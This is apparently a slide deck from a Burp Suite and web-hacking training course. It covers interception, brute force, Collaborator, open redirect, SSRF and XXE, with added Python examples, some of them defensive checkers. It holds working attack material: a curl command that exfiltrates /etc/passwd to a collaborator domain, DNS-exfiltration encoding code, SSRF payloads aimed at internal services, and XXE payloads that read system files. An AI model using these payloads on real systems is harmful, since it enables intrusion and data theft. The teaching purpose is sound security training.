Burp suite
Who am I?
• Bug hunter
• Security consultant
• 10+ years experience
• My virtual home: https://memoryleaks.ir/
• Twitter: Voorivex
BurpSuite
• BurpSuite 2.x
• Cross-platform (Java)
• A solid suite for performing web vulnerability assessments
• Configurable and extendable
BurpSuite
• Dashboard
• Target
• Scanner
• Proxy
• Intruder
• Repeater
• Collaborator
• Sequencer
• Options
• Extender
Dashboard
• Automated operations:
• Crawl (called Spider in BurpSuite 1.x)
• Crawl and Audit (active scan)
• User-driven operations:
• Active scan
• Passive scan
• Passive crawl
Target
• Site map
• Useful for finding directories, files and execution paths
• Scope
• https://site.com/solid (a single URL)
• https://site.com/.* (the whole host)
• https://site.com/path/.* (everything under one path)
Proxy
• The most used tool
• Not only a proxy but an interceptor
• Every request and response can be intercepted and modified
• Useful for working out the application's workflows
How to intercept the HTTPs traffic?
[Diagram: User <-> BurpSuite Proxy (modify) <-> Target; HTTP(s) traffic flows through the proxy in both directions]
HTTP Strict Transport Security
• Web security mechanism that prevents
• Man-in-the-middle attacks
• Visiting the site over plain HTTP
• Visiting the site with an invalid certificate (the browser offers no click-through)
• Since BurpSuite performs a MITM with its own certificate, HSTS blocks the interception

How to remove HSTS
• HSTS is not actually removed: export Burp's CA certificate and install it in the browser's trust store, so Burp's per-host certificates become valid and HSTS no longer objects
• Demo time :)
HOL (hands-on lab) - Inappropriate error handling
• Searching through the logs (Proxy history)
• Watching the responses carefully
• Chasing the responses
• Let's hack :)
HOL - Execution after Redirect
• JavaScript redirects are not a security control: the page that issues them has already been delivered
• Browsers always follow redirects
• Attackers do not
• Ignore the redirect and read the sensitive content the server already rendered in the redirecting response
• Searching through the logs (Proxy history)
• Let's hack :)
Removing Tools Signature
• Tools produce signatures (e.g. a recognisable User-Agent header)
• BurpSuite can sit in the middle to
• Capture the tool's or script's traffic
• Modify the traffic (match and replace rules)
• Remove the signatures
[Diagram: User -> Acunetix -> BurpSuite Proxy (auto-modify) -> Target]
Repeater
• Manually re-sends requests
• Manipulating and reissuing HTTP and WebSocket messages
• Good choice for discovering IDOR
Insecure Direct Object Reference
• Direct access to objects based on user-supplied input
• http://foo.bar/somepage?invoice=12345
• User IDs in JSON/XML bodies
• Downloading a file by its name
• Let's see a case
• https://hackerone.com/reports/287789
[Diagram: the user logs in and the backend returns their information via an API call carrying user_id; the attacker replays the same API call with the victim's user_id and receives the victim's information]
Intruder
• Automating customised attacks against web applications
• Extremely powerful and configurable
• Brute-force guessing
• Fuzzing directories, files and paths
• Exploiting blind SQLi (here)
• Threads, delays, payload processing, etc.
Intruder Options
• Burp's Intruder has several attack types; use
• Sniper to fuzz a single position at a time with one payload set
• Battering ram to put the same payload into every position at once
• Pitchfork to walk several payload sets in parallel (e.g. username:password pairs from a leak)
• Cluster bomb to try every combination of separate lists
• Demo time :)
Powerful Payloads
• Get powerful lists:
• SecLists - (here)
• PayloadsAllTheThings - (here)
• Bo0om fuzz - (here)
• Make custom lists
Conducting a Brute Force
• Get a username list
• Get a password list
• Brute-force an endpoint (e.g. the login) to find valid credentials
• Let's hack :)
Fuzzing Hidden Files and Dirs
• Fuzz for directories
• Fuzz inside a directory with [fuzz].[ext]
• Fuzz inside a directory with [fuzz]
• Fuzz web service methods with [fuzz]
• Let's hack :)
Fuzzing Vague Values
• Some websites use obscured values
• Base64-encoded inputs
• Hashed inputs
• Intruder's payload processing rules can encode or hash each payload before it is sent
• Let's hack :)
Burp Collaborator
• A network service used to discover vulnerabilities
• It captures out-of-band (OOB) interactions
• HTTP(s) requests
• DNS lookups
• Uses a valid, CA-signed, wildcard TLS certificate
• Useful for finding SSRF, XXE, blind XSS, etc.
[Diagram: the user sends a payload to the application; the application makes a DNS or HTTP request to Collaborator, which records the data; the user checks Collaborator for the interaction]
How to send data out of the server through HTTP/DNS?
Burp Collaborator
• It provides an address
• [unique].burpcollaborator.net
• zpsh3143whnrugrsbrjkadsa016suh.burpcollaborator.net
• The burpcollaborator.net domain might be filtered (a private Collaborator server on your own domain avoids this)
• Can be used to exfiltrate information
• curl domain.tld -d "`cat /etc/passwd | base64 -w 0`"
• nslookup [hexdata].domain.tld
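An added example (not from the deck) for the nslookup line above: packing a file into DNS names of the shape [seq].[data].[data].domain.tld within the 63-octet label and 253-octet name limits, and reassembling it from the lookups an authoritative server (Collaborator or your own) would log. No lookups are performed here; the domain and the sample data in the usage are constructed.

```python
import base64

MAX_LABEL = 63   # longest label DNS allows
MAX_NAME = 253   # longest full name that fits on the wire


def encode_for_dns(data, domain, labels_per_name=2):
    """Split data into names of the form <seq>.<label>.<label>.<domain>.
    Base32 rather than Base64: resolvers may change letter case and Base64 is case-sensitive."""
    text = base64.b32encode(data).decode("ascii").lower().rstrip("=")
    per_name = MAX_LABEL * labels_per_name
    names = []
    for seq, start in enumerate(range(0, len(text), per_name)):
        piece = text[start:start + per_name]
        labels = [piece[i:i + MAX_LABEL] for i in range(0, len(piece), MAX_LABEL)]
        name = ".".join([str(seq), *labels, domain])
        if len(name) > MAX_NAME:
            raise ValueError(f"{name!r} is longer than {MAX_NAME} octets; lower labels_per_name")
        names.append(name)
    return names


def decode_from_dns(names, domain):
    """Reassemble from the queries logged at the authoritative server. Order does not
    matter (resolvers retry and reorder); names under the zone that carry no data are skipped."""
    suffix = "." + domain.lower()
    pieces = {}
    for name in names:
        name = name.lower().rstrip(".")
        if not name.endswith(suffix):
            continue
        seq, *labels = name[: -len(suffix)].split(".")
        if seq.isdigit():
            pieces[int(seq)] = "".join(labels)
    if not pieces:
        return b""
    missing = set(range(max(pieces) + 1)) - set(pieces)
    if missing:
        raise ValueError(f"chunks never arrived: {sorted(missing)}")
    text = "".join(pieces[i] for i in range(len(pieces)))
    return base64.b32decode((text + "=" * (-len(text) % 8)).upper())


if __name__ == "__main__":
    # constructed sample; "attacker.tld" stands in for your Collaborator/private domain
    for name in encode_for_dns(b"uid=33(www-data) gid=33(www-data)\n", "attacker.tld"):
        print(name)  # on the target: nslookup <name>
```

Each printed name is one query for the target to issue; hex would work the same way but packs fewer bits per label than Base32. The sequence label is what makes reassembly survive the out-of-order and duplicated queries that recursive resolvers produce.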
Sequencer
• Analyses the quality of randomness of
• Application session tokens
• Anti-CSRF tokens
• Password reset tokens
• Demo time :)

Insufficient Entropy
• Using Sequencer to find insufficient entropy
• Let's hack :)
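An added example (not from the deck) of the per-position analysis Sequencer performs on a sample of tokens: Shannon entropy per character position, computed for tokens from a constructed weak generator (a hex counter standing in for a timestamp-based session id) and from Python's secrets module.

```python
import math
import secrets
from collections import Counter


def positional_entropy(tokens):
    """Shannon entropy in bits of each character position across equal-length tokens.
    A position that never changes contributes 0 bits; a hex digit contributes at most 4."""
    width = len(tokens[0])
    if any(len(t) != width for t in tokens):
        raise ValueError("tokens must have equal length")
    n = len(tokens)
    bits = []
    for i in range(width):
        counts = Counter(t[i] for t in tokens)
        bits.append(-sum(c / n * math.log2(c / n) for c in counts.values()))
    return bits


def estimated_bits(tokens):
    """Upper bound on a token's entropy: positions are treated as independent, so
    correlated positions (a counter, a timestamp) still look better than they are."""
    return sum(positional_entropy(tokens))


def weak_tokens(count, start=1_700_000_000):
    """Constructed weak generator: zero-padded hex of a counter, the shape a
    hex(int(time.time())) session id has."""
    return [f"{start + i:016x}" for i in range(count)]


def strong_tokens(count):
    """Reference: 64 bits from the OS CSPRNG, hex-encoded."""
    return [secrets.token_hex(8) for _ in range(count)]


if __name__ == "__main__":
    for label, sample in (("weak", weak_tokens(256)), ("strong", strong_tokens(256))):
        per_pos = [round(b, 2) for b in positional_entropy(sample)]
        print(f"{label}: ~{estimated_bits(sample):.1f} bits, per position {per_pos}")
```

With 256 samples the weak tokens score about 8 bits (only the last two hex digits move) against roughly 63 for the secrets tokens. Sequencer needs thousands of tokens for its character- and bit-level tests, and a small sample underestimates entropy, so treat a low figure from a small sample as a lead to confirm, not a finding.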
Extender
• Extends Burp's functionality with third-party code
• Languages: Java, Python (via Jython) and Ruby (via JRuby)
• There are good extensions, such as Active Scan++
• Demo time :)
Options
• There are some useful options
• Upstream and SOCKS proxy settings are handy
• Demo time :)
Open Redirect

Open Redirect
• Also known as Unvalidated Redirects and Forwards
• Redirects the user to a URL taken from a parameter without validating it
• Exploitable? Depends on the architecture of the website
• https://site.tld/r?URI=https%3A%2F%2Fwww.google.com
• Usually the URI parameter is protected by a regex
• The regex itself should not be vulnerable :)

How do SSO and OAuth bleed?
• Open redirect :) (a redirect_uri that lands on an open redirect hands the authorisation code or token to the attacker)
Vulnerable REGEX
• (Server side) Steps to redirect
• Extract the host from the URL
• Check the host against a whitelist
• Permit the redirect
• Can you spot the vulnerability?
• https?://(www.)?(?P<host>[a-z0-9.-_]*)(/.*)?
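The answer to the question above, as an added example (not from the deck): the slide's regex run in Python against crafted URLs, beside a corrected pattern and urllib's own host parsing. The whitelist {site.com} and the "exact host or subdomain" comparison are assumptions for the example; the slide does not show the check it uses.

```python
import re
from urllib.parse import urlsplit

# The pattern exactly as written on the slide. Inside the character class, ".-_"
# is a RANGE from "." (0x2E) to "_" (0x5F): it admits "/", ":", "=", "?", "@" and
# the uppercase letters, so the "host" group runs on past the real host name.
# The unescaped dot in "(www.)?" is a second bug: "www" followed by ANY character.
VULNERABLE = re.compile(r"https?://(www.)?(?P<host>[a-z0-9.-_]*)(/.*)?")

# Same shape with the hyphen moved to the end (a literal "-") and the dot escaped;
# the host group now stops at the first "/", ":", "@" or "?".
FIXED = re.compile(r"https?://(www\.)?(?P<host>[a-z0-9._-]*)(/.*)?")

ALLOWED_HOSTS = {"site.com"}  # assumed whitelist for the example


def host_by_regex(url, pattern):
    """Step 1 of the slide: extract the host with a regex."""
    match = pattern.match(url)
    return match.group("host") if match else None


def vulnerable_host(url):
    return host_by_regex(url, VULNERABLE)


def fixed_host(url):
    return host_by_regex(url, FIXED)


def host_by_urlsplit(url):
    """The robust alternative: let the URL parser find the authority."""
    return urlsplit(url).hostname


def is_allowed(url, extract_host):
    """Steps 2 and 3 of the slide: whitelist check, exact host or a subdomain of it."""
    host = extract_host(url)
    return host is not None and any(
        host == allowed or host.endswith("." + allowed) for allowed in ALLOWED_HOSTS
    )


def report(url):
    """Where a browser goes versus what each extractor lets through."""
    return {
        "browser_host": host_by_urlsplit(url),
        "vulnerable_regex": is_allowed(url, vulnerable_host),
        "fixed_regex": is_allowed(url, fixed_host),
        "urlsplit": is_allowed(url, host_by_urlsplit),
    }


if __name__ == "__main__":
    for url in (
        "https://evil.com/.site.com",   # "/" is inside the range: the path is swallowed into "host"
        "https://www-site.com",         # "(www.)?" eats "www-" and leaves "site.com"
        "https://www.site.com/login",   # legitimate redirect
    ):
        print(url, report(url))
```

For `https://evil.com/.site.com` the slide's regex returns `evil.com/.site.com` as the host, which ends in `.site.com` and passes, while the browser goes to evil.com; `https://www-site.com` passes because the unescaped dot matched the hyphen. Whichever comparison the real code used, handing it a string that is not a hostname is the root problem, and `urlsplit().hostname` avoids the whole class.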
Case Study

Time to Hack :)
• It's time to hack :)
Server-Side Request Forgery

Introduction
• The ability to make the vulnerable server issue requests to the intranet or internet
• Interacting with:
• Cloud server metadata services
• Database HTTP interfaces
• Internal REST interfaces
• Reading files
• Scanning internal IPs/ports
Example
[Diagram: steps 1-4 between the attacker, the public web server and a second web server reachable only through it; the caption "Direct request is ..." is cut off in the original]

The Vulnerable Code
(shown as a screenshot in the original slide)
Attack Example
• The code on the previous slide is vulnerable to SSRF
• Normal usage:
• https://site.com/?url=index
• Attack vectors:
• https://site.com/?url=http://127.0.0.1:9200/ (Elasticsearch's default port)
• https://site.com/?url=http://127.0.0.1:8080/manager/ (Tomcat manager)
Various Schemes
• Other protocols extend the attack surface of SSRF
• Examples:
• https://site.com/?url=file:///etc/passwd
• https://site.com/?url=dict://localhost:3779/

Schemes
• Protocols extend the attack surface of SSRF; which ones work depends on the client library behind the request
• file:// -> lets an attacker read a file from the server
• dict:// -> the DICT dictionary protocol; a simple way to push a line of text at a TCP port
• sftp:// -> file transfer over SSH
• ldap:// -> Lightweight Directory Access Protocol
• tftp:// -> Trivial File Transfer Protocol, works over UDP
• gopher:// -> designed for distributing, searching and retrieving documents; lets the attacker send almost arbitrary bytes to a TCP port
• http:// -> fetches any content from the web
• https:// -> same as http, over TLS
Detection
• Listen on a common port on a server you control (or use Collaborator)
• Put https://your-ip in every URL-like input and watch for the callback
Filters
• Some filters forbid:
• Sending requests to internal IP addresses
• Changing the URL scheme
• Sending requests to domains that are not white-listed, e.g. by regex:
• https?://(www.)?domain.com/.+
• https?://.+?.?domain.com/.+
Time to Hack :)
• It's time to hack :)
Bypass Filters 1
• Internal IP address filters
• Use a domain name instead of an IP address
• xip.io was a wildcard DNS service (nip.io and sslip.io offer the same today)
• dig A 10.0.0.1.xip.io
• dig A anything.10.0.0.1.xip.io
• dig A 1ynrnhl.xip.io (base32(int('254.169.254.169')))
• Open redirect on a white-listed domain
• Alternate IP address spellings:
• 127.1 or 0x7F000001
• http://[::1]/ or http://[::]/
Bypass Filters 2
• Scheme filters
• Can be bypassed by a server-side redirect:
• https://domain.tld/?url=https://attacker.tld/r.php
• r.php redirects to the filtered scheme; its contents were shown as an image in the original slide
Bypass Filters 3
• White-listed domain filter
• Open redirect vulnerability on the white-listed domain
• https://domain.tld/?url=https://sub.domain.tld/?next=https://attacker.com
Trick
• A magic input:
• url = https://user@evil.com@domain.tld/
• curl url -> the request goes to evil.com
• (php) parse_url(url) -> host: domain.tld
• The two parsers disagree on where the authority ends, so the check and the fetch see different hosts
• Example:
• https://fireshellsecurity.team/sunshinectf-search-box/
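An added example (not from the deck) that ties the three bypass slides and the trick together: a Python destination check that normalises IP literals the way inet_aton does, resolves names through an injectable resolver, applies the scheme and host allowlists to the parsed URL r than to the raw string, and rebuilds the URL so the client fetches exactly what was checked. The allowlist, the fake resolver and the 1.2.3.4 address in the test are constructed; the second regex from the Filters slide is included only to show what it lets through.

```python
import ipaddress
import re
import socket
from urllib.parse import urlsplit, urlunsplit

# One dotted part the way inet_aton reads it: "0x" hex, leading-zero octal, or decimal.
_PART = re.compile(r"(?i)^(?:0x([0-9a-f]+)|(0[0-7]*)|([1-9][0-9]*))$")


def parse_ipv4_literal(text):
    """IPv4Address for any spelling the C resolver accepts (127.1, 0x7f000001,
    2130706433, 0177.0.0.1, ...); None if the text is not such a literal."""
    parts = text.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    values = []
    for part in parts:
        m = _PART.match(part)
        if m is None:
            return None
        hex_digits, octal_digits, decimal_digits = m.groups()
        if hex_digits is not None:
            values.append(int(hex_digits, 16))
        elif octal_digits is not None:
            values.append(int(octal_digits, 8))
        else:
            values.append(int(decimal_digits))
    *head, last = values
    tail_bytes = 4 - len(head)  # the final part fills every byte not covered by the others
    if any(v > 0xFF for v in head) or last >= 256 ** tail_bytes:
        return None
    number = 0
    for v in head:
        number = (number << 8) | v
    return ipaddress.IPv4Address((number << (8 * tail_bytes)) | last)


def to_address(host):
    """IP literal -> address object (IPv4-mapped IPv6 unwrapped); hostname -> None."""
    addr = parse_ipv4_literal(host)
    if addr is None:
        try:
            addr = ipaddress.IPv6Address(host)
        except ValueError:
            return None
        if addr.ipv4_mapped is not None:
            addr = addr.ipv4_mapped
    return addr


def is_internal(addr):
    return (addr.is_loopback or addr.is_private or addr.is_link_local
            or addr.is_unspecified or addr.is_multicast or addr.is_reserved)


def system_resolver(host):
    """Every address the OS would hand a client for this name."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def check_url(url, allowed_hosts=None, resolver=system_resolver):
    """(True, normalised_url) when the destination is acceptable, else (False, reason)."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ("http", "https"):
        return False, f"scheme {parts.scheme!r} not allowed"
    host = parts.hostname  # lower-cased; brackets and userinfo already stripped
    if not host:
        return False, "no host"
    if allowed_hosts is not None and not any(
        host == a or host.endswith("." + a) for a in allowed_hosts
    ):
        return False, f"host {host!r} not in allowlist"
    literal = to_address(host)
    candidates = [literal] if literal is not None else [to_address(a) for a in resolver(host)]
    if not candidates:
        return False, f"{host!r} does not resolve"
    for addr in candidates:
        if addr is None or is_internal(addr):
            return False, f"{host!r} points at internal address {addr}"
    try:
        port = parts.port
    except ValueError:
        return False, "invalid port"
    netloc = f"[{host}]" if ":" in host else host
    if port is not None:
        netloc += f":{port}"
    # Rebuild from the parsed pieces: the userinfo is dropped, so the HTTP client cannot
    # read "user@evil.com@domain.tld" differently from the way this check read it.
    return True, urlunsplit((parts.scheme.lower(), netloc, parts.path or "/", parts.query, ""))


# The second allowlist regex from the Filters slide, kept only to show what it accepts.
SLIDE_FILTER = re.compile(r"https?://.+?.?domain.com/.+")
```

Two caveats the check alone does not cover: the HTTP client must be run with redirects disabled and every Location header fed back through check_url (the Bypass Filters 2 and 3 slides), and resolving here and again inside the client leaves a DNS-rebinding window, so a hardened fetcher connects to the vetted address itself rather than to the name.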
XML External Entity

XML External Entity
• XML (Extensible Markup Language) is a very popular data format
• Some applications use XML to transmit data between the browser and the server
• Tampering with that XML may lead to XXE
• XXE allows an attacker to interfere with an application's processing of XML data
• The XML specification contains various potentially dangerous features
[Diagram: the web service saves the XML file, the backend server parses it and returns the response]
XML External Entity
Request (plain):
POST /endpoint HTTP/1.1

<foo>
Hello World
</foo>

Response:
HTTP/1.1 200 OK

Hello World

Request (internal entity):
POST /endpoint HTTP/1.1

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY bar "World">
]>
<foo>
Hello &bar;
</foo>

Response:
HTTP/1.1 200 OK

Hello World
XML External Entity
• It seems harmless?
• Many XML parsers are configured to process external entities
• An external entity is declared with an external identifier, a document-processing construct
• There are two kinds of external identifier in XML:
• PUBLIC
• SYSTEM
• A SYSTEM identifier gives the exact location (a URI) of the external resource
XML External Entity
Request:
POST /endpoint HTTP/1.1

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<foo>
&xxe;
</foo>

Response:
HTTP/1.0 200 OK

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
(...)
PHP Wrappers
Request:
POST /endpoint HTTP/1.1

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY bar SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/fstab">
]>
<foo>
&bar;
</foo>

Response (the file Base64-encoded, so characters such as < in it cannot break the XML):
HTTP/1.0 200 OK

IyAvZXRjL2ZzdGFiOiBzdGF0aWMgZmlsZSBzeXN0ZW0g
aW5mb3JtYXRpb24uDQojDQojIDxmaWxlIHN5c3R...
XML External Entity
• Attackers are not limited to system files
• With some XML parsers it is even possible to get directory listings
• Attackers can also make the parser send HTTP(s) and other requests (SSRF through XXE) via
• http://
• https://
• gopher://
• dict://
• Which schemes work depends on the parser's URL handler

Directory Listing
• Some parsers (Java's are the well-known case) return a directory listing for a file:// URI that names a directory
• <!ENTITY % file SYSTEM "file:///etc/">
More Scenarios
• Many applications support "file upload" functionality
• XLSX, DOCX, PPTX, SVG and other XML-based formats
• The application processes the uploaded files
• These files have an XML MIME type or contain XML parts
• An attacker can put the XXE payload inside that XML
• root-me.org, SamBox-v3 is a good example
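An added example (not from the deck): the slide's payload parsed by two expat-based parsers in Python. parse_trusting registers an external-entity handler that fetches whatever SYSTEM identifier the document names, which is the behaviour the previous slides exploit; parse_hardened rejects any DOCTYPE before an entity can be declared. The secret file, its file:// URI and the demo helper are constructed for the example.

```python
import pathlib
import tempfile
import urllib.request
import xml.parsers.expat as expat


def build_xxe_payload(target_uri):
    """Same shape as the slide's request body: an external general entity whose
    SYSTEM identifier names the resource to read, referenced inside <foo>."""
    return (
        '<?xml version="1.0" encoding="ISO-8859-1"?>\n'
        "<!DOCTYPE foo [\n"
        "<!ELEMENT foo ANY>\n"
        f'<!ENTITY xxe SYSTEM "{target_uri}">\n'
        "]>\n"
        "<foo>&xxe;</foo>\n"
    ).encode("latin-1")


def parse_trusting(xml_bytes):
    """Vulnerable: whatever URI the document names is fetched and inlined as text."""
    parser = expat.ParserCreate()
    text = []
    parser.CharacterDataHandler = text.append

    def fetch_external_entity(context, base, system_id, public_id):
        with urllib.request.urlopen(system_id) as resp:  # file://, http://, ...
            body = resp.read()
        # The child parser inherits CharacterDataHandler, so the fetched bytes
        # land in the same output as ordinary element text.
        parser.ExternalEntityParserCreate(context).Parse(body, True)
        return 1

    parser.ExternalEntityRefHandler = fetch_external_entity
    parser.Parse(xml_bytes, True)
    return "".join(text)


def parse_hardened(xml_bytes):
    """Safe: reject the DTD outright, so no entity (internal or external) can be
    declared; expat never dereferences a SYSTEM id on its own without a handler."""
    parser = expat.ParserCreate()
    text = []
    parser.CharacterDataHandler = text.append

    def reject_doctype(name, system_id, public_id, has_internal_subset):
        raise ValueError(f"DOCTYPE {name!r} rejected: DTDs are not accepted")

    parser.StartDoctypeDeclHandler = reject_doctype
    parser.Parse(xml_bytes, True)
    return "".join(text)


def demo():
    """Run both parsers against a payload pointing at a temporary secret file."""
    with tempfile.TemporaryDirectory() as tmp:
        secret = pathlib.Path(tmp) / "fstab"
        secret.write_text("# constructed stand-in for /etc/fstab\nUUID=1234 / ext4 defaults 0 1\n")
        payload = build_xxe_payload(secret.as_uri())
        leaked = parse_trusting(payload)
        try:
            parse_hardened(payload)
            rejected = False
        except ValueError:
            rejected = True
    return {"leaked": leaked, "hardened_rejected": rejected}


if __name__ == "__main__":
    print(demo())
```

Refusing every DOCTYPE also refuses the harmless internal entity from the "Hello &bar;" slide; that is the intended trade, since an external DTD can declare entities too. If an application genuinely needs DTDs, use a library that exposes the switches explicitly (lxml's XMLParser with resolve_entities=False and no_network=True, or defusedxml) rather than a handler-less default you have to audit.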
Get in touch
https://twitter.com/ravinacademy
https://www.linkedin.com/company/ravin-academy/about/
https://t.me/ravinacademy
info@ravinacademy.com
